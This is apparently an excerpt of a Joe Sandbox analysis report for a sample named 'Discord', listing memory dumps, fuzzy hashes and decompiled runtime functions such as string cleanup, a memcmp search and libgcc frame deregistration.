Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: a4dab5fa85e448dd61c23815a049267cf810388ada765765d6d4f5b2535210c9
Instruction ID: 16cac4d09336ac0baf566d1510ce868d4dd70f30be7befa462de7eefa1fef151
Opcode Fuzzy Hash: a4dab5fa85e448dd61c23815a049267cf810388ada765765d6d4f5b2535210c9
Instruction Fuzzy Hash: 0901E57494890A8FCB10DF64C48899DB7F8BF54318F21899D9199E7242EB30A64ACF01

Uniqueness

Uniqueness Score: -1.00%

Function 6DE89FF8 Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE89FF8() {
				intOrPtr _t15;
				intOrPtr _t20;
				intOrPtr _t23;
				intOrPtr _t28;
				void* _t29;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr* _t32;
				intOrPtr* _t33;

				_t23 = _t15;
				 *_t30 =  *((intOrPtr*)(_t29 - 0x3c));
				L6DE8DD48();
				_t31 = _t30 - 4;
				 *__esp =  *((intOrPtr*)(__ebp - 0x3c));
				L6DE8DD48();
				__esp = __esp - 4;
				while(1) {
					_t20 = _t29 - 0x37;
					 *_t32 = _t20;
					L6DE8DD48();
					_t33 = _t32 - 4;
					 *_t33 = _t23;
					L6DE8EBA0();
					_t23 = _t20;
					 *_t33 =  *((intOrPtr*)(_t29 - 0x3c));
					L6DE8DD48();
					_t31 = _t33 - 4;
					 *_t31 = _t28;
					L6DE8DD48();
					_t32 = _t31 - 4;
				}
			}

0x6de89ff8
0x6de8a003
0x6de8a006
0x6de8a00b
0x6de8a017
0x6de8a01a
0x6de8a01f
0x6de89f8a
0x6de89f90
0x6de89f93
0x6de89f96
0x6de89f9b
0x6de89f9e
0x6de89fa1
0x6de89fa6
0x6de89fb1
0x6de89fb4
0x6de89fb9
0x6de89f7c
0x6de89f82
0x6de89f87
0x6de89f87

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F82
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89F96
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE89FA1
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE89FB4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8A006
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8A01A

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 6093050c37badaa2be338900bc1ad65e51d08a9f51743b28e8e03d26f2a8566f
Instruction ID: 8f14568564a0f7b35d4d079a5692a1c27cb1633c8ea5fc22262a2226748dcd4a
Opcode Fuzzy Hash: 6093050c37badaa2be338900bc1ad65e51d08a9f51743b28e8e03d26f2a8566f
Instruction Fuzzy Hash: B401DAB8D055098FCF05EFB8D19889CF7F0EF48218F11852AE955AB351EB30A949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83B39 Relevance: 9.0, APIs: 6, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6DE83B39() {
				intOrPtr _t13;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;

				_t21 = _t13;
				 *_t31 = _t29;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t30 - 0xd8)));
				 *_t31 = _t29;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t30 - 0xd4)));
				 *_t31 = _t29;
				L6DE8DD48();
				while(1) {
					_t18 = _t30 - 0xe3;
					 *_t31 = _t18;
					L6DE8DD48();
					_push(_t18);
					 *_t31 = _t21;
					L6DE8EBA0();
					_t21 = _t18;
					 *_t31 =  *((intOrPtr*)(_t30 - 0xf0));
					L6DE8DD48();
				}
			}

0x6de83b39
0x6de83a78
0x6de83a7e
0x6de83a83
0x6de83a8a
0x6de83a90
0x6de83a95
0x6de83a9c
0x6de83aa2
0x6de83aa8
0x6de83ab1
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ad9
0x6de83adc
0x6de83ae1

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000), ref: 6DE83A7E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000), ref: 6DE83A90
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000), ref: 6DE83AA2
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: ca739514c36ab36b6fe2a7392d58434456b6e5d8a27c3bd3d9ba54e5dc06ff28
Instruction ID: 4d42f767bf4b0a5c3c9e01616faab5c57a18b91b4df8ed19def9a273746d9fbe
Opcode Fuzzy Hash: ca739514c36ab36b6fe2a7392d58434456b6e5d8a27c3bd3d9ba54e5dc06ff28
Instruction Fuzzy Hash: 0201FB74948A158FC710EF14D888B5CF7F8FF94214F11859DA54AE7251EB305A84CF11

Uniqueness

Uniqueness Score: -1.00%

Function 6DE942B8 Relevance: 9.0, APIs: 6, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E6DE942B8() {
				intOrPtr _t58;
				intOrPtr _t62;
				void* _t87;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr* _t121;

				_t119 = _t58;
				while(1) {
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x18)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x14)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x10)) - 0xc);
					_t62 =  *((intOrPtr*)(_t87 + 0xc));
					 *_t121 = _t120;
					L6DE8DD48();
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t62);
					 *_t121 = _t119;
					L6DE8EBA0();
					_t119 = _t62;
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x78)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x74)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x70)) - 0xc);
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t118);
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x68)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x64)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x60)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x5c)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x58)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x54)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x50)) - 0xc);
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t118);
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x48)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x44)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x40)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x3c)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x38)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x34)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x30)) - 0xc);
					 *_t121 = _t120;
					L6DE8DD48();
					_push(_t118);
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x28)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x24)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x20)));
					 *_t121 = _t120;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t87 + 0x1c)));
				}
			}

0x6de942b8
0x6de941bd
0x6de941c0
0x6de941c6
0x6de941cb
0x6de941cf
0x6de941d5
0x6de941da
0x6de941de
0x6de941e4
0x6de941e9
0x6de941ea
0x6de941ed
0x6de941f3
0x6de941fc
0x6de94202
0x6de94207
0x6de94208
0x6de9420b
0x6de94210
0x6de94058
0x6de9405e
0x6de94063
0x6de94067
0x6de9406d
0x6de94072
0x6de94076
0x6de9407c
0x6de94081
0x6de94085
0x6de9408b
0x6de94090
0x6de94094
0x6de9409a
0x6de9409f
0x6de940a3
0x6de940a9
0x6de940ae
0x6de940b2
0x6de940b8
0x6de940bd
0x6de940c1
0x6de940c7
0x6de940cc
0x6de940d0
0x6de940d6
0x6de940db
0x6de940df
0x6de940e5
0x6de940ea
0x6de940ee
0x6de940f4
0x6de940f9
0x6de940fd
0x6de94103
0x6de94108
0x6de9410c
0x6de94112
0x6de94117
0x6de9411b
0x6de94121
0x6de94126
0x6de9412a
0x6de94130
0x6de94135
0x6de94139
0x6de9413f
0x6de94144
0x6de94148
0x6de9414e
0x6de94153
0x6de94157
0x6de9415d
0x6de94162
0x6de94166
0x6de9416c
0x6de94171
0x6de94175
0x6de9417b
0x6de94180
0x6de94184
0x6de9418a
0x6de9418f
0x6de94193
0x6de94199
0x6de9419e
0x6de941a2
0x6de941a8
0x6de941ad
0x6de941b1
0x6de941b7
0x6de941bc
0x6de941bc

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6DE941C6
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 6DE941D5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941E4
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE941F3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE94202
_Unwind_Resume.LIBGCC_S_DW2-1(00000000), ref: 6DE9420B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: ebdb0e8530c616e632481bc63f5c8406cbc59f2ce677651b7d02ccecb1f47ff4
Instruction ID: f4d23aec5b6a4d5a66be20d3c0469fd35dedb7db6782d92f0a273e25493b6e5d
Opcode Fuzzy Hash: ebdb0e8530c616e632481bc63f5c8406cbc59f2ce677651b7d02ccecb1f47ff4
Instruction Fuzzy Hash: 33F01DB40499009FC309EF18D9D4829B7E9EFD8764B22854DE99ACF259DF309940CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6DE939D6 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE939F2
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE93A04
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000), ref: 6DE93A13
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000), ref: 6DE93A22
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000), ref: 6DE93A31
_Unwind_Resume.LIBGCC_S_DW2-1(00000000), ref: 6DE93A3A

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: b017302d560fea8228339f7f28a1221dfe3bcd40dae5832c805d6442594d3bff
Instruction ID: a3e8f99e120f8cd63a18ee1806a8963a5bc19ef9d31f5e17d610e51825a35ff7
Opcode Fuzzy Hash: b017302d560fea8228339f7f28a1221dfe3bcd40dae5832c805d6442594d3bff
Instruction Fuzzy Hash: AFF0F4B40499008FC305EF18D9D8968B7E9FF98664F22865DED8ACB29ADF305540CB22

Uniqueness

Uniqueness Score: -1.00%

Function 6DE95470 Relevance: 8.9, APIs: 7, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE95470(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t42;
				intOrPtr _t44;
				intOrPtr* _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr* _t57;
				intOrPtr _t58;
				signed int _t64;
				signed int _t65;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t71;
				intOrPtr* _t72;

				_t72 = _t71 - 0x1c;
				_t57 = _a4;
				_t64 = _a8 - _t57;
				_t65 = _t64 >> 4;
				_t42 = _t64 >> 2;
				if(_t65 <= 0) {
					_t66 = _a4;
					goto L17;
				} else {
					_t66 = (_t65 << 4) + _t57;
					_t69 =  *_a12;
					_t70 =  *((intOrPtr*)(_t69 - 0xc));
					do {
						_t50 =  *_t57;
						if( *((intOrPtr*)(_t50 - 0xc)) != _t70) {
							L2:
							_t51 =  *((intOrPtr*)(_t57 + 4));
							if( *((intOrPtr*)(_t51 - 0xc)) == _t70) {
								_v36 = _t70;
								_v40 = _t69;
								 *_t72 = _t51;
								L6DE93660();
								if(_t51 != 0) {
									goto L3;
								} else {
									return _t57 + 4;
								}
							} else {
								L3:
								_t52 =  *((intOrPtr*)(_t57 + 8));
								if( *((intOrPtr*)(_t52 - 0xc)) == _t70) {
									_v36 = _t70;
									_v40 = _t69;
									 *_t72 = _t52;
									L6DE93660();
									if(_t52 != 0) {
										goto L4;
									} else {
										_t45 = _t57 + 8;
										goto L9;
									}
								} else {
									L4:
									_t53 =  *((intOrPtr*)(_t57 + 0xc));
									if( *((intOrPtr*)(_t53 - 0xc)) == _t70) {
										_v36 = _t70;
										_v40 = _t69;
										 *_t72 = _t53;
										L6DE93660();
										if(_t53 != 0) {
											goto L5;
										} else {
											_t45 = _t57 + 0xc;
											goto L9;
										}
									} else {
										goto L5;
									}
								}
							}
						} else {
							_v36 = _t70;
							_v40 = _t69;
							 *_t72 = _t50;
							L6DE93660();
							if(_t50 != 0) {
								goto L2;
							} else {
								_t45 = _t57;
								L9:
								return _t45;
							}
						}
						goto L35;
						L5:
						_t57 = _t57 + 0x10;
					} while (_t66 != _t57);
					_t42 = _a8 - _t66 >> 2;
					L17:
					if(_t42 == 2) {
						_t68 =  *_a12;
						_t58 =  *((intOrPtr*)(_t68 - 0xc));
						goto L22;
					} else {
						if(_t42 == 3) {
							_t47 =  *_t66;
							_t68 =  *_a12;
							_t58 =  *((intOrPtr*)(_t68 - 0xc));
							if( *((intOrPtr*)(_t47 - 0xc)) == _t58) {
								_v36 = _t58;
								_v40 = _t68;
								 *_t72 = _t47;
								L6DE93660();
								_t45 = _t66;
								if(_t47 != 0) {
									goto L29;
								} else {
								}
							} else {
								L29:
								_t66 = _t66 + 4;
								L22:
								_t44 =  *_t66;
								if( *((intOrPtr*)(_t44 - 0xc)) == _t58) {
									_v36 = _t58;
									_v40 = _t68;
									 *_t72 = _t44;
									L6DE93660();
									_t45 = _t66;
									if(_t44 != 0) {
										goto L23;
									} else {
									}
								} else {
									L23:
									_t66 = _t66 + 4;
									goto L24;
								}
							}
						} else {
							if(_t42 == 1) {
								_t68 =  *_a12;
								_t58 =  *((intOrPtr*)(_t68 - 0xc));
								L24:
								_t46 =  *_t66;
								if( *((intOrPtr*)(_t46 - 0xc)) != _t58) {
									goto L20;
								} else {
									_v36 = _t58;
									_v40 = _t68;
									 *_t72 = _t46;
									L6DE93660();
									_t45 = _t66;
									if(_t46 != 0) {
										goto L20;
									} else {
									}
								}
							} else {
								L20:
								_t45 = _a8;
							}
						}
					}
					goto L9;
				}
				L35:
			}

0x6de95474
0x6de95477
0x6de9547f
0x6de95483
0x6de95486
0x6de9548b
0x6de95602
0x00000000
0x6de95491
0x6de95498
0x6de9549a
0x6de9549c
0x6de954c4
0x6de954c4
0x6de954c9
0x6de954a1
0x6de954a1
0x6de954a7
0x6de954f0
0x6de954f4
0x6de954f8
0x6de954fb
0x6de95502
0x00000000
0x6de95504
0x6de9550e
0x6de9550e
0x6de954a9
0x6de954a9
0x6de954a9
0x6de954af
0x6de95510
0x6de95514
0x6de95518
0x6de9551b
0x6de95522
0x00000000
0x6de95524
0x6de95524
0x00000000
0x6de95524
0x6de954b1
0x6de954b1
0x6de954b1
0x6de954b7
0x6de95530
0x6de95534
0x6de95538
0x6de9553b
0x6de95542
0x00000000
0x6de95548
0x6de95548
0x00000000
0x6de95548
0x00000000
0x00000000
0x00000000
0x6de954b7
0x6de954af
0x6de954cb
0x6de954cb
0x6de954cf
0x6de954d3
0x6de954d6
0x6de954dd
0x00000000
0x6de954df
0x6de954df
0x6de954e1
0x6de954e8
0x6de954e8
0x6de954dd
0x00000000
0x6de954b9
0x6de954b9
0x6de954bc
0x6de95556
0x6de95559
0x6de9555c
0x6de95575
0x6de95577
0x00000000
0x6de9555e
0x6de95561
0x6de955b7
0x6de955b9
0x6de955bb
0x6de955c1
0x6de955c8
0x6de955cc
0x6de955d0
0x6de955d3
0x6de955da
0x6de955de
0x00000000
0x00000000
0x6de955e0
0x6de955c3
0x6de955c3
0x6de955c3
0x6de9557a
0x6de9557a
0x6de9557f
0x6de955e5
0x6de955e9
0x6de955ed
0x6de955f0
0x6de955f7
0x6de955fb
0x00000000
0x00000000
0x6de955fd
0x6de95581
0x6de95581
0x6de95581
0x00000000
0x6de95581
0x6de9557f
0x6de95563
0x6de95566
0x6de955ac
0x6de955ae
0x6de95584
0x6de95584
0x6de95589
0x00000000
0x6de9558b
0x6de9558b
0x6de9558f
0x6de95593
0x6de95596
0x6de9559d
0x6de955a1
0x00000000
0x00000000
0x6de955a3
0x6de955a1
0x6de95568
0x6de95568
0x6de95568
0x6de95568
0x6de95566
0x6de95561
0x00000000
0x6de9555c
0x00000000

APIs

memcmp.MSVCRT ref: 6DE954D6

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: a26a0eb3b3c42a3c0b15c384a850b0cdab3e869d0ade9aaffd769638292239d1
Instruction ID: 5ef3358b97cc2a48b972a14458a0db80467520808bde5b362f97bb828f88470d
Opcode Fuzzy Hash: a26a0eb3b3c42a3c0b15c384a850b0cdab3e869d0ade9aaffd769638292239d1
Instruction Fuzzy Hash: 1B510BB1A1A3159FC740CF19C48482AB7E2FB8476AFB5846EE5499F315DB30E840CB41

Uniqueness

Uniqueness Score: -1.00%

Function 004015AC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 004015BD
GetProcAddress.KERNEL32 ref: 004015DA
FreeLibrary.KERNEL32 ref: 004015FE

Strings

__deregister_frame_info, xrefs: 004015CF
libgcc_s_dw2-1.dll, xrefs: 004015B6

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: __deregister_frame_info$libgcc_s_dw2-1.dll
API String ID: 4061214504-2468945734
Opcode ID: fa6dd0c1c1dee6ab5b30f03e2beb3d71a2a9ee9edc390f73b1015c5ace5cfe82
Instruction ID: 8df3e781454bdb9a2a6b6cacc9d1e82a39ab4913794d73216eb6b6beaea767f8
Opcode Fuzzy Hash: fa6dd0c1c1dee6ab5b30f03e2beb3d71a2a9ee9edc390f73b1015c5ace5cfe82
Instruction Fuzzy Hash: E7F012B19046004BC7007F7C9A0911B7AF4AB81305F05C43DD986FB3A4EB78E808CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8150C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6DE8151D
GetProcAddress.KERNEL32 ref: 6DE8153A
FreeLibrary.KERNEL32 ref: 6DE8155E

Strings

libgcc_s_dw2-1.dll, xrefs: 6DE81516
__deregister_frame_info, xrefs: 6DE8152F

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: __deregister_frame_info$libgcc_s_dw2-1.dll
API String ID: 4061214504-2468945734
Opcode ID: 751e627782a0e68a84781dbfcacc5e8b0060d8fd03a3fc83ba4ed2f0ef8a5bcc
Instruction ID: 673c222657e8aa344e0a7d355ca232ec22c70b4a890204a76582ceb90ffafc09
Opcode Fuzzy Hash: 751e627782a0e68a84781dbfcacc5e8b0060d8fd03a3fc83ba4ed2f0ef8a5bcc
Instruction Fuzzy Hash: A8F01CB09046028FDB107FBD855A62E7EF0AF52604F25442CD8AAEF215EF35D859CB83

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 004015BD
GetProcAddress.KERNEL32 ref: 004015DA
FreeLibrary.KERNEL32 ref: 004015FE

Strings

__deregister_frame_info, xrefs: 004015CF
libgcc_s_dw2-1.dll, xrefs: 004015B6

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
